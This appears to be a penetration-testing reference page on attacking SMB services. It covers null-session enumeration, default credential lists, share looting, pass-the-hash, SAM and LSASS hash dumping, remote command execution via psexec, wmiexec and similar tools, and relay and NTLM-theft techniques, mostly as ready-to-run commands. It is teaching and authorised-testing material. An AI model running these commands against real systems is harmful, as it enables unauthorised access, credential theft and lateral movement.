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# 139,445 - Pentesting SMB
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## **Port 139**
**NetBIOS** stands for _Network Basic Input Output System_. It is a software protocol that allows applications, PCs, and Desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and usually, separate from the computer name. Two applications start a NetBIOS session when one (the client) sends a command to “call” another client (the server) over **TCP Port 139**. (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
## Port 445
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. **SMB** stands for ‘**Server Message Blocks**’. Server Message Block in modern language is also known as **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP\*\*.\*\* (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
### SMB
Server Message Block (`SMB`) is a **client-server** protocol that regulates **access to files** and entire directories and other network resources such as printers, routers, or interfaces released for the network. The main application area of the protocol has been the **Windows** operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed.\
With the free software project **Samba**, there is also a solution that enables the use of **SMB in Linux** and Unix distributions and thus cross-platform communication via SMB.
An SMB server can provide **arbitrary parts of its local file system as shares**. Therefore the **hierarchy visible** to a client is partially **independent** of the **structure** on the **server**. **Access rights** are defined by `Access Control Lists` (`ACL`). They can be controlled in a **fine-grained manner** based on attributes such as **`execute`**, **`read`**, and **`full access`** for individual users or user groups. The **ACLs** are defined **based on the shares** and therefore do not correspond to the rights assigned locally on the server.
### IPC$ share
From book _**Network Security Assessment 3rd edition**_
With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:
* Operating system information
* Details of the parent domain
* A list of local users and groups
* Details of available SMB shares
* The effective system security policy
## What is NTLM
If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:**
{% content-ref url="../windows-hardening/ntlm/" %}
{% endcontent-ref %}
## **Server Enumeration**
### **Scan** a network searching for hosts:
nbtscan -r
### SMB server version
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
* Or this script:
#Author: rewardone
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
### **Search exploit**
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
### **Possible** Credentials
| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### Brute Force
* [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb)
### SMB Environment Information
### Obtain Information
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
### Enumerate Users, Groups & Logged On Users
This info should already being gathered from enum4linux and enum4linux-ng
crackmapexec smb --users [-u <username> -p <password>]
crackmapexec smb --groups [-u <username> -p <password>]
crackmapexec smb --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N
### Enumerate local users
lookupsid.py -no-pass hostname.local
for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
### Metasploit - Enumerate local users
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
### **Enumerating LSARPC and SAMR rpcclient**
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
{% endcontent-ref %}
### GUI connection from linux
#### In the terminal:
`xdg-open smb://cascade.htb/`
#### In file browser window (nautilus, thunar, etc)
## Shared Folders Enumeration
### List shared folders
It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
### **Connect/List a shared folder**
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
### **Manually enumerate windows shares and connect to them**
It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.
Common share names for windows targets are
* C$
* D$
* IPC$
* FAX$
(Common share names from _**Network Security Assessment 3rd edition**_)
You can try to connect to them by using the following command
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
or this script (using a null session)
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
smbclient -U '%' -N \\\\\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
### **Enumerate shares from Windows / without third-party tools**
# Retrieves the SMB shares on the locale computer.
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
CMD console
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (graphical)
# Shared Folders: Shared Folders > Shares
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
explorer.exe (graphical), enter `\\<ip>\` to see the available non-hidden shares.
### Mount a shared folder
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
### **Download files**
Read previous sections to learn how to connect with credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
* recurse: toggles recursion on (default: off)
* prompt: toggles prompting for filenames off (default: on)
* mget: copies all files matching the mask from host to client machine
(_Information from the manpage of smbclient_)
### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
Snaffler.exe -s -d domain.local -o snaffler.log -v data
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
sudo crackmapexec smb -u username -p pass -M spider_plus --share 'Department Shares'
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
{% endhint %}
## Read Registry
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
## Post Exploitation
The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:
| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `enable privileges = yes` | Honor privileges assigned to specific SID? |
| `create mask = 0777` | What permissions must be assigned to the newly created files? |
| `directory mask = 0777` | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where the output of the magic script needs to be stored? |
The command `smbstatus` gives information about the **server** and about **who is connected**.
## Authenticate using Kerberos
You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
## **Execute Commands**
### **crackmapexec**
crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
apt-get install crackmapexec
crackmapexec smb -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@ #Pass-the-Hash
psexec \\ -u Administrator -p 123456Ww
psexec \\ -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@ #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@ #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
### [AtExec](../windows-hardening/ntlm/atexec.md)
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@ "whoami"
## Impacket reference
## **Bruteforce users credentials**
**This is not recommended, you could block an account if you exceed the maximum allowed tries**
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
## SMB relay attack
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\\path\image.jpg"`
This happens with the functions:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
Which are used by some browsers and tools (like Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
### SMBTrap using MitMf
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
## NTLM Theft
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).
[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
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